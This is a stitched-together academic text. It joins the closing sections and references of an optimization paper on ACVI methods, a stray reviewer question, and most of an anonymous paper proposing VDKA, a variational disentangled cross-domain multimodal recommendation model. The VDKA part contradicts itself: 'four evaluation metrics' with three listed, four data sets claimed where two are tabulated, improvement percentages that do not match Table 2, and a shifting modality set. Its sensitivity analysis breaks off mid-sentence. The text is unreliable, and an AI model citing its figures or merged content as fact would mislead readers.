**MNIST.** In Fig. 3 we compare PI-ACVI and baselines on the (C-GAN) game trained on the MNIST dataset, employing the greedy projection algorithm (Beck, 2017) for the projections. Since ACVI was derived primarily for handling general constraints, a natural question is how it (and its variants) performs when the projection is fast to compute. Although the projection is fast to compute in these experiments, PI-ACVI still converges faster than the projection-based methods; and unlike the projected EG method, which improves upon GDA only when the rotational component of $F$ is high, it gives consistent improvements over the GDA baseline.

5.3 Effect of Warm-up on I-ACVI and PI-ACVI

**I-ACVI.** The experiments in Fig. 1 motivate increasing the number of iterations $K$ only at the first iteration $t = 0$—denoted $K_0$—so that the early iterates are close to the central path. Recall that the $K$ steps (corresponding to line 7 in Algorithm 1) bring the iterates closer to the central path as $K \to \infty$ (see App. B). After those $K_0$ steps, $\mu$ is decayed, which moves the problem's solution along the central path. For I-ACVI, from Fig. 4(c)—where $\ell$ is fixed to 10—we observed that regardless of the selected value of $K_+$ for $t > 0$, a small $K_+$ can be compensated for by a large enough $K_0$.
**PI-ACVI.** We similarly study the impact of the warm-up technique for the PI-ACVI method (Algorithm 2). Compared to I-ACVI, this method omits the outer loop over $t \in [T]$; hence, instead of varying $K_0$, we experiment with increasing $\ell$ at the first iteration $k = 0$, denoted by $\ell_0$. In Fig. 3 we solve the constrained MNIST problem with PI-ACVI using either $\ell_0 = 500$ or $\ell_0 = 100$, with $\ell_+$ set to 20 in both cases. Increasing $\ell_0$ significantly improves the convergence speed.

**Conclusion.** We consistently observe that using a large $K_0$ for I-ACVI, or a large $\ell_0$ for PI-ACVI, aids convergence. Conversely, factors such as $\ell$ and $K_+$ in I-ACVI, or $\ell_+$ in PI-ACVI, exert a comparatively lesser influence. Further experiments and discussions are available in App. D.

6 Discussion

We contributed to an emerging line of research on the ACVI method, showing that the last iterate of ACVI converges at a rate of order $O(1/\sqrt{K})$ for monotone VIs. This result is significant because it does not rely on the first-order smoothness of the operator, resolving an open problem in the VI literature. To address subproblems that cannot always be solved in closed form, we introduced an inexact ACVI (I-ACVI) variant that uses warm-starting for its subproblems and proved last-iterate convergence under certain weak assumptions. We also proposed P-ACVI for simple inequality constraints and showed that it converges at an $O(1/\sqrt{K})$ rate. Our experiments provided insights into I-ACVI's behavior when subproblems are solved approximately, emphasized the impact of warm-starting, and highlighted advantages over standard projection-based algorithms.

ACKNOWLEDGMENTS

We acknowledge support from the Swiss National Science Foundation (SNSF), grants P2ELP2_199740 and P500PT_214441. The work of T. Yang is supported in part by the NSF grant CCF-2007911 to Y. Chi.

REFERENCES

Yossi Arjevani, Shai Shalev-Shwartz, and Ohad Shamir. On lower and upper bounds for smooth and strongly convex optimization problems. In JMLR, 2016.

Wäiss Azizian, Ioannis Mitliagkas, Simon Lacoste-Julien, and Gauthier Gidel. A tight and unified analysis of gradient-based methods for a whole spectrum of differentiable games. In AISTATS, pp. 2863–2873, 2020.

Amir Beck. First-Order Methods in Optimization. SIAM, 2017.

Amir Beck and Marc Teboulle. Mirror descent and nonlinear projected subgradient methods for convex optimization. Oper. Res. Lett., 31(3):167–175, 2003.

Dimitri Bertsekas, Angelia Nedic, and Asuman Ozdaglar. Convex Analysis and Optimization, volume 1. Athena Scientific, 2003.

Radu Ioan Bot, Ernö Robert Csetnek, and Phan Tu Vuong. The forward-backward-forward method from continuous and discrete perspective for pseudo-monotone variational inequalities in Hilbert spaces. arXiv:1808.08084, 2020.

Radu Ioan Bot, Ernö Robert Csetnek, and Dang-Khoa Nguyen. Fast OGDA in continuous and discrete time. arXiv:2203.10947, 2022.

Stephen Boyd and Lieven Vandenberghe. Convex Optimization. Cambridge University Press, 2004.

Stephen Boyd, Neal Parikh, Eric Chu, Borja Peleato, and Jonathan Eckstein. Distributed optimization and statistical learning via the alternating direction method of multipliers. Foundations and Trends in Machine Learning, 3, 2011. ISSN 1935-8237. doi: 10.1561/2200000016.

Yang Cai, Argyris Oikonomou, and Weiqiang Zheng.
Tight last-iterate convergence of the extragradient method for constrained monotone variational inequalities. arXiv:2204.09228, 2022. Tatjana Chavdarova, Gauthier Gidel, François Fleuret, and Simon Lacoste-Julien. Reducing noise in GAN training with variance reduced extragradient. In NeurIPS, 2019. Tatjana Chavdarova, Matteo Pagliardini, Sebastian U Stich, François Fleuret, and Martin Jaggi. Taming GANs with Lookahead-Minmax. In ICLR, 2021. Tatjana Chavdarova, Michael I. Jordan, and Manolis Zampetakis. Last-iterate convergence of saddle point optimizers via high-resolution differential equations. In Minimax Theory and its Applications, 2023. Xiaojun Chen, Liqun Qi, and Defeng Sun. Global and superlinear convergence of the smoothing newton method and its application to general box constrained variational inequalities. Mathematics of Computation, 67(222):519–540, 1998. Rune Christiansen, Niklas Pfister, Martin Emil Jakobsen, Nicola Gnecco, and Jonas Peters. A causal framework for distribution generalization. arXiv:2006.07433, 2020. Liang-Ju Chu. On the continuity of trajectories for nonlinear monotone complementarity problems. Scientiae Mathematicae, 1(3):263–275, 1998. Richard W. Cottle and George B. Dantzig. Complementary pivot theory of mathematical programming. Linear Algebra and its Applications, 1(1):103–125, 1968. ISSN 0024-3795. Constantinos Daskalakis and Ioannis Panageas. Last-iterate convergence: Zero-sum games and constrained min-max optimization. In ITCS, 2019.
SerYSFntLh
In the sensitivity analysis, the model performance fluctuates up and down rather than rising and then plateauing (or showing no obvious change) as described in the paper. How can this phenomenon be explained? In addition, when taking the two extreme values (0.2 and 1.0), the performance difference on some datasets (such as $\lambda$ on the Book domain) is very small. How can this be explained?
Variational Disentangled Cross-domain Knowledge Alignment for Multimodal Recommendation

Anonymous authors

Paper under double-blind review

Abstract

Multimodal recommendation systems have been widely used in e-commerce and short-video platforms. Because data volume and data distribution differ greatly across business scenarios, cross-domain recommendation studies how to use rich source-domain data to improve performance in the target domain. Some studies use encoders to represent domain information and design knowledge-alignment objectives to achieve cross-domain knowledge transfer. However, simple information representation and alignment methods are easily affected by noisy information, leading to negative transfer. Moreover, the feature distributions of different domains deviate substantially from one another, which hinders effective knowledge transfer. We therefore propose a Variational Disentangled Cross-domain Knowledge Alignment Method (VDKA) for multimodal recommendation. Specifically, we propose a variational multimodal graph attention encoder, which consists of a variational autoencoder and a graph attention encoder. The variational encoder learns domain-shared and domain-specific representations while exploiting multimodal data. We then introduce variational optimization objectives and disentangled representation objectives to improve the accuracy of the domain representations. Furthermore, to address domain knowledge distribution drift, adversarial learning is designed to realize cross-domain knowledge alignment. We conducted comprehensive experiments on four real-world multimodal data sets, and the experimental results show that our proposed VDKA method outperforms other state-of-the-art models. Ablation experiments verify the effectiveness of each of our designs.

1 Introduction

With the increasing richness of image, audio, and text information, recommendation models based on multimodal data have gradually achieved better results (Wang et al., 2023; Yu et al., 2022). Compared with single-modal information, users are more likely to be attracted by the product displays and feature introductions in videos (Chen et al., 2022; Guo et al., 2022). Since these platforms host rich scenarios, the data volume and data distribution of each business scenario differ considerably. Therefore, cross-domain recommendation, which studies how to use rich source-domain data to improve performance in a target domain with sparse data, has received increasing attention (Kang et al., 2019; Cao et al., 2022b).

Some methods mainly add multimodal data to the model as side information (Chen et al., 2019; Deldjoo et al., 2021): they use visual and text encoders to extract semantic features from images and text, and cross them with attribute features to construct inputs for prediction. The main idea of cross-domain recommendation is to transfer knowledge from a source domain with rich feature information to the target domain, so as to improve the accuracy of matching items with users in the target domain (Zhu et al., 2021; 2022). Although existing cross-domain research has achieved promising results, several problems remain in multimodal cross-domain recommendation. First, the key problem of cross-domain recommendation is how to use source-domain knowledge to improve the model's performance in the target domain.
Many methods map feature information directly into a semantic space using encoders and transfer knowledge by feature crossing or by aligning the representations of the two domains. Such coarse representations are easily disturbed by noisy information. Moreover, the knowledge contained in different domains may be contradictory, and naive alignment is likely to cause negative transfer (Cao et al., 2022a; Zang et al., 2022). Second, although some methods design disentangled representation networks to map domain features into the same semantic space, the distributions of knowledge in different domains remain biased, and knowledge transfer over biased distributions leads to biased model learning. Third, the effective utilization of different modalities is an important issue in multimodal recommendation, and simply treating modal data as side information is imprecise.

Considering these key problems, we propose a new solution: a Variational Disentangled Cross-domain Knowledge Alignment Method (VDKA) for Multimodal Recommendation, which effectively improves multimodal cross-domain recommendation. Specifically, we propose a variational multimodal graph attention encoder, which consists of a variational autoencoder and a graph attention encoder. The variational autoencoder is designed to learn domain-shared and domain-specific representations; the graph attention encoder extracts multimodal feature information effectively. We then introduce variational optimization objectives and disentangled representation objectives to improve the accuracy of the domain-shared and domain-specific representations. Furthermore, to address domain knowledge distribution drift, adversarial learning is designed to realize cross-domain knowledge alignment. Finally, we combine the optimization objectives into the loss function for model training. As a summary, the main contributions of this paper are as follows:

- We propose a variational multimodal graph attention encoder. Specifically, the variational autoencoder is designed to learn domain-shared and domain-specific representations, and the graph attention encoder is used to extract multimodal feature information effectively.
- We propose a variational disentangled cross-domain knowledge alignment method (VDKA) for multimodal recommendation. VDKA uses variational encoders to extract domain-shared and domain-specific representations, and further realizes cross-domain knowledge alignment through adversarial learning.
- We conducted comprehensive experiments on four real-world multimodal data sets. Experimental results show that our proposed VDKA method outperforms other state-of-the-art models, and ablation experiments verify the effect of each module. We will make our data sets and code public to contribute to community development.

2 RELATED WORK

As an important research direction in the field of recommendation, multimodal recommendation has been widely studied (Du et al., 2022; Yu et al., 2022; Han et al., 2022). A large body of work explores the extraction and utilization of multimodal data to improve model performance (Xu et al., 2023; Yu et al., 2022; Han et al., 2022). Some methods add multimodal data as auxiliary features to the model and achieve good results (Chen et al., 2019; Deldjoo et al., 2021).
VBPR (He & McAuley, 2016) incorporates visual features extracted from product images into matrix factorization to reveal the visual dimensions that most influence people's behavior. Many works use self-supervised contrastive learning to address problems such as data sparsity (Xie et al., 2022; Tao et al., 2022; Yu et al., 2021). MMGCL (Yi et al., 2022) designs two augmentation techniques, modality edge dropout and modality masking, to generate multiple views of users and items, and introduces a negative sampling technique to learn the correlations between modalities. Much work using graph neural networks to extract multimodal information has also achieved good results (Zhao & Wang, 2021; Yu et al., 2022; Wei et al., 2020). MMGCN (Wei et al., 2019) constructs a user-item bipartite graph for each modality and enriches the representation of each node with the topology and features of its neighbors. MGAT (Tao et al., 2020) propagates information in a single graph and uses a gated attention mechanism to identify the varying importance of different modalities to user preferences.

Much research explores how to use source-domain data to improve prediction in the target domain, so as to achieve effective cross-domain recommendation (Hu et al., 2018; Zhao et al., 2019; Sheng et al., 2021). These studies focus on the extraction of domain information and the transfer of cross-domain knowledge. Some works mainly use encoders to learn domain representations and use cross-transfer modules to achieve knowledge alignment (Wang et al., ). DDTCDR (Li & Tuzhilin, 2020) extends CoNet by learning a latent orthogonal projection function to transfer user similarity across domains. BiTGCf (Liu et al., 2020) uses LightGCN (He et al., 2020) as an encoder to aggregate interaction information for each domain, and further introduces a feature transfer layer to enhance the two base graph encoders. Other works focus on disentangling domain representations. CDRIB (Cao et al., 2022b) adopts an information bottleneck perspective to obtain information shared between domains. DisenCDR (Cao et al., 2022a) proposes two mutual-information-based disentanglement regularizers to separate domain-shared and domain-specific information. DDGHM (Zheng et al., 2022) proposes dual dynamic graph modeling and hybrid metric training to improve cross-domain recommendation. UniCDR (Cao et al., 2023) models different CDR scenarios generically by passing domain-shared information.

3 PRELIMINARIES

This paper studies the cross-domain scenario of multimodal recommendation. Our proposed method can be conveniently extended to scenarios with more than two domains; for simplicity, we focus on two domains that share a common set of users. We let $D^A = (U^A, V^A, I^A)$ and $D^B = (U^B, V^B, I^B)$ represent the interaction data of domain A and domain B, respectively. $U$ denotes the user set shared by both domains, $V$ denotes the item set of each domain, and $I$ denotes the interaction edge set in each domain. In addition, two binary matrices $Y^A \in \{0, 1\}^{|U| \times |V^A|}$ and $Y^B \in \{0, 1\}^{|U| \times |V^B|}$ represent the interaction matrices of domains A and B, respectively, where $Y_{i,j}$ denotes whether user $u_i$ has interacted with item $v_j$ in the edge set $I$. We focus on multimodal recommendation scenarios; in this paper, we mainly consider visual and textual modal data.
We represent the multimodal information as $x_m$, where $m \in M = \{v, t, a\}$: $v$ denotes visual features, $t$ textual features, and $a$ acoustic features.

4 METHODOLOGY

In this section, we give a detailed introduction to the proposed VDKA method. The overall architecture and components of VDKA are shown in Fig. 1.

Figure 1: Overall architecture and components of the proposed VDKA method.

4.1 VARIATIONAL MULTIMODAL GRAPH ATTENTION ENCODER

4.1.1 VARIATIONAL AUTO-ENCODER

The variational auto-encoder (VAE) combines variational inference with the auto-encoder and is an unsupervised generative model. VAE assumes that there exists a latent variable $z$, so the marginal distribution can be computed as \( P_\theta(x) = \sum_z P_\theta(x, z) \), where the joint distribution factorizes as \( P_\theta(x, z) = P_\theta(x|z)P(z) \). The prior \( P(z) \) of the latent variable \( z \) is assumed to be a Gaussian with zero mean and unit variance. If one attempts to fit a neural network approximating \( P_\theta(x|z) \) without a suitable loss function, it will ignore \( z \) and yield the trivial solution \( P_\theta(x|z) = P_\theta(x) \); this does not provide a good estimate of \( P_\theta(x) \). By Bayes' theorem, the posterior \( P_\theta(z|x) = P_\theta(x|z)P(z)/P_\theta(x) \) is likewise intractable. The goal of VAE is therefore to find a tractable distribution that approximates \( P_\theta(z|x) \), that is, an estimate of the conditional distribution of the latent variable \( z \) given the input \( x \). Based on variational inference and Bayes' theorem, the variational objective is:

\[
L_{VAE} = E_{Q_\phi(z|x)}[\log P_\theta(x|z)] - D_{KL}(Q_\phi(z|x)\|P(z)) \leq \log P_\theta(x) \tag{1}
\]

The left side of the above inequality is called the evidence lower bound (ELBO). The inference model generates the latent variable \( z \) from the input \( x \), so \( Q_\phi(z|x) \) plays the role of the encoder in an auto-encoder model, while \( P_\theta(x|z) \) acts as a decoder that reconstructs the input from a sample of the inference model. To make the lower bound differentiable with respect to the encoder parameters, the reparameterization trick is used:

\[
z = \mu_\phi(x) + \sigma_\phi(x) \odot \epsilon, \quad \text{where} \quad \epsilon \sim \mathcal{N}(0, I) \tag{2}
\]

where \( \odot \) denotes the Hadamard product, and \( \mu \) and \( \sigma \) represent the mean and standard deviation of the multivariate Gaussian distribution corresponding to the latent variable \( z \). A minimal sketch of Eqs. (1)-(2) is given after § 4.1.2.

### 4.1.2 Multimodal Graph Attention Encoder

In the multimodal scenario, users have different preferences over different modalities, and a simple modal representation cannot accurately describe a user's modal preference. We represent the interaction information as a bipartite user-item graph \( G = \{(u, i)|u \in U, i \in I\} \), where \( U \) denotes the user set and \( I \) denotes the item set. We represent the set of modalities as \( M = \{v, t, a\} \), including visual features \( v \), textual features \( t \), and acoustic features \( a \). We then design a multimodal graph attention encoder to learn representation vectors; its design details are provided in Appendix D.
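As noted at the end of § 4.1.1, the following is a minimal sketch of the reparameterized sampling of Eq. (2) and the (negative) ELBO of Eq. (1); the Gaussian encoder with mean and log-variance heads and the mean-squared reconstruction term are our illustrative assumptions, not details given in the paper.

```python
import torch
import torch.nn.functional as Fn

def reparameterize(mu, logvar):
    eps = torch.randn_like(mu)                   # eps ~ N(0, I)
    return mu + torch.exp(0.5 * logvar) * eps    # z = mu + sigma * eps, Eq. (2)

def neg_elbo(x, x_hat, mu, logvar):
    # negative of Eq. (1): reconstruction term plus KL(Q_phi(z|x) || N(0, I))
    recon = Fn.mse_loss(x_hat, x, reduction="sum")   # stands in for -E[log P_theta(x|z)]
    kl = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())
    return recon + kl
```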
Based on the above graph attention method, we obtain the representation matrix \( H \in \mathbb{R}^{|U|\times d} \) with multimodal importance awareness. We then feed \( H^A \), belonging to domain A, into the variational autoencoder of Section 4.1.1 to generate the latent variable \( Z \):

\[
\mu^A = \phi(W^A_\mu H^A); \quad \sigma^A = \phi(W^A_\sigma H^A); \quad Z^A \sim \mathcal{N}(\mu^A, [\text{diag}\{\sigma^A\}]^2) \tag{3}
\]

where \( W^A_\mu \) and \( W^A_\sigma \) are parameter matrices. By performing variational graph attention encoding on the data of both domains, the representations \( Z^A \) and \( Z^B \) are obtained.

### 4.2 Domain-shared and Domain-specific Representation Learning

Since the source and target domains often have very different distributions, cross-domain information must be mapped into the same semantic space to realize knowledge transfer. However, it is difficult to ensure that encoders represent cross-domain data accurately in one semantic space. In addition, even when cross-domain data can be mapped into a lower-dimensional semantic space, the problem of domain distribution drift remains. Therefore, to transfer knowledge across domains accurately and effectively, we consider disentangled learning of domain-shared and domain-specific representations. A domain-shared representation carries common knowledge with the same semantic structure across domains, while a domain-specific representation carries semantic knowledge unique to a single domain. When domain representations with a common semantic structure are extracted, knowledge transfer becomes more effective, avoiding the negative transfer caused by useless cross-domain information.

#### 4.2.1 Variational Encoding Objective

The variational multimodal graph attention encoder provides a latent representation with multimodal awareness; the latent variable \( z \) is inferred by an encoder with the approximate posterior \( Q_\phi(z|x) \). Based on the above analysis, we posit that cross-domain data admit a shared latent representation \( z_c \) with a common semantic structure and a specific latent representation \( z_s \) with an independent semantic structure. Each variational encoder therefore has two branches, constructing the latent variables \( z_c \) and \( z_s \) respectively. The joint probability distribution of the variables is:

\[
P_\theta(x, z_c, z_s) = P_\theta(x|z_c, z_s)P(z_c)P(z_s) \tag{4}
\]

where \( P(z_c) \) and \( P(z_s) \) are prior distributions, Gaussians with zero mean and unit variance, and \( P_\theta(x|z_c, z_s) \) is the generation distribution. Further, the distribution \( Q_\phi(z_c, z_s|x) \) factorizes as:

\[
Q_\phi(z_c, z_s|x) = Q_\phi(z_c|x)Q_\phi(z_s|x) \tag{5}
\]

where \( Q_\phi(z_c|x) \) and \( Q_\phi(z_s|x) \) obey Gaussian distributions whose parameters are produced by the encoder. We therefore rewrite the VAE loss of Section 4.1.1 to obtain the loss based on the latent variables \( z_c \) and \( z_s \):

\[
L_V = E_{Q_\phi(z_c,z_s|x)}[\log P_\theta(x|z_c, z_s)] - D_{KL}(Q_\phi(z_c|x)\|P(z_c)) - D_{KL}(Q_\phi(z_s|x)\|P(z_s)) \tag{6}
\]

In particular, since we focus on the representations of multiple domains, we obtain the loss \( L^A_V \) for domain A and the loss \( L^B_V \) for domain B. A sketch of this two-branch objective follows.
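As mentioned above, the following sketches the two-branch objective of Eq. (6). The encoder heads `W_mu_c`, `W_logvar_c`, `W_mu_s`, `W_logvar_s` and the `decoder` are hypothetical modules, and we parameterize variances via log-variance heads rather than the direct $\sigma$ heads of Eq. (3) for numerical stability; both choices are our assumptions.

```python
import torch
import torch.nn.functional as Fn

def variational_loss(H, decoder, W_mu_c, W_logvar_c, W_mu_s, W_logvar_s):
    # two-branch encoding: shared (z_c) and specific (z_s) latent variables
    mu_c, logvar_c = W_mu_c(H), W_logvar_c(H)
    mu_s, logvar_s = W_mu_s(H), W_logvar_s(H)
    z_c = mu_c + torch.exp(0.5 * logvar_c) * torch.randn_like(mu_c)
    z_s = mu_s + torch.exp(0.5 * logvar_s) * torch.randn_like(mu_s)
    # -E[log P(x|z_c, z_s)] surrogate: reconstruct H from both branches jointly
    recon = Fn.mse_loss(decoder(torch.cat([z_c, z_s], dim=-1)), H, reduction="sum")
    kl = lambda m, lv: -0.5 * torch.sum(1 + lv - m.pow(2) - lv.exp())
    return recon + kl(mu_c, logvar_c) + kl(mu_s, logvar_s), z_c, z_s
```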
### 4.2.2 Disentangled Representation Objective

To make full use of cross-domain information, we introduce information bottleneck theory to capture the correlation between domains. Specifically, we construct intra-domain and inter-domain information bottleneck regularizers from two different perspectives.

**Intra-domain information bottleneck regularization.** To ensure that the disentangled representations can recover the original feature information, we construct a reconstruction objective as a constraint. For instance, for the data \( X^A \) of domain A, we obtain the corresponding domain-shared representation \( Z^A_c \) and domain-specific representation \( Z^A_s \). We expect \( Z^A_c \) and \( Z^A_s \) to differ sufficiently, so that they contain only domain-shared semantic information and domain-specific semantic information, respectively; at the same time, we want \( Z^A_c \) and \( Z^A_s \) jointly to deviate from \( X^A \) as little as possible, meaning that the two representations together can reconstruct the original features. The intra-domain information bottleneck regularization loss is therefore defined as:

\[
L_{intra} = I(Z^A_c; Z^A_s) - I(Z^A_c, Z^A_s; X^A) \tag{7}
\]

where \( I \) denotes the mutual information operator.

**Inter-domain information bottleneck regularization.** For the shared representation \( Z^A_c \) extracted from domain A, mutual information with the shared representation \( Z^B_c \) extracted from domain B should be maximized. Moreover, the original feature information \( X^A \) of domain A should be reconstructable from the shared representation \( Z^B_c \) of domain B together with the specific representation \( Z^A_s \) of domain A; symmetrically, the original feature information \( X^B \) of domain B should be reconstructable from \( Z^A_c \) and \( Z^B_s \). Introducing these reconstruction objectives enables the model to exploit cross-domain information for knowledge transfer while learning accurate domain-shared and domain-specific representations. The inter-domain information bottleneck regularization loss is defined as:

\[
L_{inter} = -I(Z^A_c; Z^B_c) - I(Z^B_c, Z^A_s; X^A) - I(Z^A_c, Z^B_s; X^B) \tag{8}
\]

We combine the intra-domain and inter-domain information bottleneck losses into the disentangled optimization loss \( L_D \); one possible instantiation is sketched below.
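The paper does not specify the mutual-information estimators for Eqs. (7)-(8). One possible instantiation (our assumption, not the authors' implementation) uses InfoNCE as a tractable lower bound for the maximized MI terms, reconstruction error as a surrogate for the $I(\cdot; X)$ terms, and a squared-cosine penalty as a lightweight proxy for minimizing $I(Z^A_c; Z^A_s)$; the decoders `dec_a`, `dec_b` are hypothetical modules.

```python
import torch
import torch.nn.functional as Fn

def info_nce(za, zb, tau=0.1):
    za, zb = Fn.normalize(za, dim=-1), Fn.normalize(zb, dim=-1)
    logits = za @ zb.t() / tau
    labels = torch.arange(za.size(0), device=za.device)
    return Fn.cross_entropy(logits, labels)   # minimizing this maximizes a bound on I(za; zb)

def disentangle_loss(zc_a, zs_a, zc_b, zs_b, xa, xb, dec_a, dec_b):
    intra = Fn.cosine_similarity(zc_a, zs_a, dim=-1).pow(2).mean() \
            + Fn.mse_loss(dec_a(torch.cat([zc_a, zs_a], dim=-1)), xa)        # Eq. (7)
    inter = info_nce(zc_a, zc_b) \
            + Fn.mse_loss(dec_a(torch.cat([zc_b, zs_a], dim=-1)), xa) \
            + Fn.mse_loss(dec_b(torch.cat([zc_a, zs_b], dim=-1)), xb)        # Eq. (8)
    return intra + inter   # L_D
```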
4.3 Cross-domain Knowledge Alignment

There are large differences in data distribution and data sparsity among domains, so the information of different domains natively lives in heterogeneous semantic spaces. We therefore introduce adversarial learning to realize cross-domain alignment: instead of learning directly from unconstrained latent representations, we aim to reduce the distribution bias between $z^A_c$ and $z^B_c$. Under the covariate shift hypothesis, consistent optimization of the source and target domains makes the predictions of the two domains consistent. Motivated by (Long et al., 2018), we introduce a domain discriminator to reduce domain differences. One way to estimate the difference is to look at the loss of the domain classifier $G_d$, provided that the classifier's parameters $\theta_d$ have been trained to differentiate optimally between the two feature distributions. To reduce the distribution difference between $z^A_c$ and $z^B_c$, we therefore seek a saddle point of the objective $E(\theta_f, \theta_y, \theta_d)$:

$$(\hat{\theta}_f, \hat{\theta}_y) = \arg\min_{\theta_f, \theta_y} E(\theta_f, \theta_y, \hat{\theta}_d), \qquad \hat{\theta}_d = \arg\max_{\theta_d} E(\hat{\theta}_f, \hat{\theta}_y, \theta_d)$$

$$E(\theta_f, \theta_y, \theta_d) = L_y(G_y(z^A_c, z^A_s, \theta_y)) - \lambda \sum_{i \in A} L_d(G_d(z^A_{c,i}, \theta_d)) - \lambda \sum_{i \in B} L_d(G_d(z^B_{c,i}, \theta_d))$$

where $L_y$ is the model prediction loss and $L_d$ is the domain classification loss; $z^A_{c,i}$ denotes the domain-shared representation of sample $i$ from domain A; $\hat{\theta}_f$ is the optimized parameter of the feature encoder that generates $z_c$; $\hat{\theta}_y$ is the optimized parameter of the prediction network, which minimizes the prediction loss; and $\hat{\theta}_d$ is the optimized parameter of the discriminator network $G_d$, trained to classify the domains as well as possible (i.e., to maximize $E$ over $\theta_d$). Since the learning objective of the discriminator is opposite to that of the main task, a gradient reversal layer (GRL) (Long et al., 2018) is introduced to facilitate effective parameter updating. We take the optimization objective $E(\theta_f, \theta_y, \theta_d)$ as the knowledge alignment loss $L_A$.

4.4 Optimization

In this paper, a variational multimodal graph attention encoder is introduced to extract multimodal information and construct domain-shared and domain-specific representations, with the variational optimization objectives guiding the model toward accurate and effective feature representations. Denoting the main interaction prediction loss as $L_y$, the final loss function is:

$$L = L_y + \alpha(L^A_V + L^B_V) + \gamma L_D - \lambda L_A \tag{10}$$

where $\alpha$, $\gamma$, and $\lambda$ are hyperparameters controlling the weights of the different losses.
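A minimal sketch of how the gradient reversal layer of § 4.3 can realize the $-\lambda L_A$ term of Eq. (10) in practice; the module names, the binary-domain-label setup, and the pre-computed partial losses are our illustrative assumptions.

```python
import torch

class GradReverse(torch.autograd.Function):
    """Gradient reversal layer (GRL): identity in the forward pass,
    gradients multiplied by -lamb in the backward pass."""
    @staticmethod
    def forward(ctx, x, lamb):
        ctx.lamb = lamb
        return x.view_as(x)
    @staticmethod
    def backward(ctx, grad_out):
        return -ctx.lamb * grad_out, None

def total_loss(L_y, L_V_A, L_V_B, L_D, zc_a, zc_b, G_d, alpha, gamma, lamb):
    # the discriminator G_d learns to classify the domain, while the reversed
    # gradient pushes the encoder to confuse it; the GRL already realizes the
    # "-lambda * L_A" sign of Eq. (10), so the terms are simply summed here
    zc = torch.cat([zc_a, zc_b], dim=0)
    dom = torch.cat([torch.zeros(len(zc_a)), torch.ones(len(zc_b))]).long().to(zc.device)
    L_A = torch.nn.functional.cross_entropy(G_d(GradReverse.apply(zc, lamb)), dom)
    return L_y + alpha * (L_V_A + L_V_B) + gamma * L_D + L_A
```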
Following related work (Cao et al., 2022a), we choose four widely used evaluation metrics, including Hit Rate (HR), Normalized Discounted Cumulative Gain (NDCG) and Mean Reciprocal Rank (MRR). We set the length of ranked list as 20. The implementation details are provided in Appendix B. Baseline methods. To evaluate the performance, we compared the proposed VDKA model with three types of baselines: (1) CF-based methods, i.e., BPRMF (Rendle et al., 2012) and NGCF (Wang et al., 2019). (2) Multi-modal the state-of-the-art methods, i.e., MMGCL (Yi et al., 2022), LATTICE (Zhang et al., 2021) and HCGCN (Mu et al., 2022)). (3) Cross-domain the state-of-the-art methods, i.e., DDTCDR (Li & Tuzhilin, 2020), BiTGCf (Liu et al., 2020), DisenCDR (Cao et al., 2022a) and DDGHM (Zheng et al., 2022)). The details of baselines are provided in Appendix A. 5.2 Performance comparisons (RQ1) We conducted a comprehensive experiment on two pairs of cross-domain datasets and compared our proposed VDKA method with other baseline methods. The experimental results are shown in Table 2. From the observation of the experimental results, we have the following findings. (a) Our proposed VDKA method outperforms all other SOTA cross-domain models and multi-modal models. The improvement is significant in all four experimental data sets. Experimental results verify the effectiveness of VDKA in multimodal cross-domain recommendation. (b) Compared with DDGHM and other cross-domain models, VDKA has significantly improved in the four data sets. The experimental results show that our method of disentangled representation and knowledge alignment is effective for cross-domain knowledge transfer. (c) Compared with cross-domain recommendation methods such as BiTGCf, HCGCN method focusing on multi-modal information utilization has better effect. This shows that the extraction and utilization of multi-modal features is as important as the cross-domain module in the multi-modal recommendation. 5.3 Ablation studies (RQ2) In order to explore the influence of each module designed by us on the model effect, we conducted ablation experiments as follows. (a) We removed the variational multimodal graph attention encoder from the model and directly used two MLPs to learn domain-shared and domain-specific representations, denoted as w/o VE. (b) We removed the multimodal graph attention encoder, denoted as w/o GA. (c) We removed the disentangled optimization objective, denoted as w/o DR. (d) We removed the knowledge alignment objective, denoted as w/o KA. The experimental results are shown in Table 3. First, when we replaced the variational encoder with MLP, the model performance decreased significantly. This shows that the variational multimodal graph attention encoder is effective in extracting multimodal data and constructing domain representation. Secondly, when we removed the disentangled target and the knowledge alignment target respectively, the model effect decreases to a certain extent. The experimental results show that these two modules are important to the model. 5.4 Sensitivity analysis (RQ3) To further explore the impact of these parameters on the model effect, we conducted sensitivity analysis on the following key parameters. (a) Impact of $\gamma$. We set the value of $\gamma$ to adjust from [0.2, 0.4, 0.6, 0.8, 1.0] to explore the impact on the model effect. The experimental performance on Table 2: Overall performance comparison of all models on four data sets. 
Table 2: Overall performance comparison of all models on the Movie & Book cross-domain data sets.

| Model | Movie HR@20 | Movie NDCG@20 | Movie MRR@20 | Book HR@20 | Book NDCG@20 | Book MRR@20 |
|-------------|------------|---------------|--------------|------------|--------------|-------------|
| BPRMF | 0.1568 | 0.1041 | 0.0974 | 0.1407 | 0.0873 | 0.0837 |
| NGCF | 0.2319 | 0.1799 | 0.1713 | 0.2167 | 0.1619 | 0.1607 |
| MMGCL | 0.2658 | 0.2176 | 0.2114 | 0.2687 | 0.2019 | 0.1845 |
| LATTICE | 0.2911 | 0.2336 | 0.2227 | 0.2793 | 0.2201 | 0.2067 |
| HCGCN | 0.3253 | 0.2923 | 0.2767 | 0.3003 | 0.2649 | 0.2525 |
| DDTCDR | 0.2935 | 0.2621 | 0.2385 | 0.2568 | 0.2145 | 0.2019 |
| BiTGCf | 0.3134 | 0.2902 | 0.2775 | 0.2721 | 0.2407 | 0.2337 |
| DisenCDR | 0.3265 | 0.2944 | 0.2780 | 0.2867 | 0.2577 | 0.2398 |
| DDGHM | 0.3308 | 0.3011 | 0.2883 | 0.2981 | 0.2721 | 0.2635 |
| VDKA | **0.3625** | **0.3246** | **0.2932** | **0.3317** | **0.2892** | **0.2764** |
| Improvement | 5.25% | 4.78% | 5.81% | 6.16% | 6.77% | 6.77% |

Table 3: Ablation experimental results. N denotes the NDCG metric.

| Model | Movie HR@20 | Movie N@20 | Book HR@20 | Book N@20 | Food HR@20 | Food N@20 | Kitchen HR@20 | Kitchen N@20 |
|---------|------------|------------|------------|-----------|------------|-----------|---------------|--------------|
| VDKA | **0.3625** | **0.3246** | **0.3317** | **0.2892** | **0.3272** | **0.2936** | **0.3438** | **0.3212** |
| w/o VE | 0.2915 | 0.2733 | 0.2553 | 0.2172 | 0.2633 | 0.2386 | 0.2763 | 0.2463 |
| w/o GA | 0.3304 | 0.3001 | 0.2943 | 0.2639 | 0.2906 | 0.2729 | 0.3186 | 0.2825 |
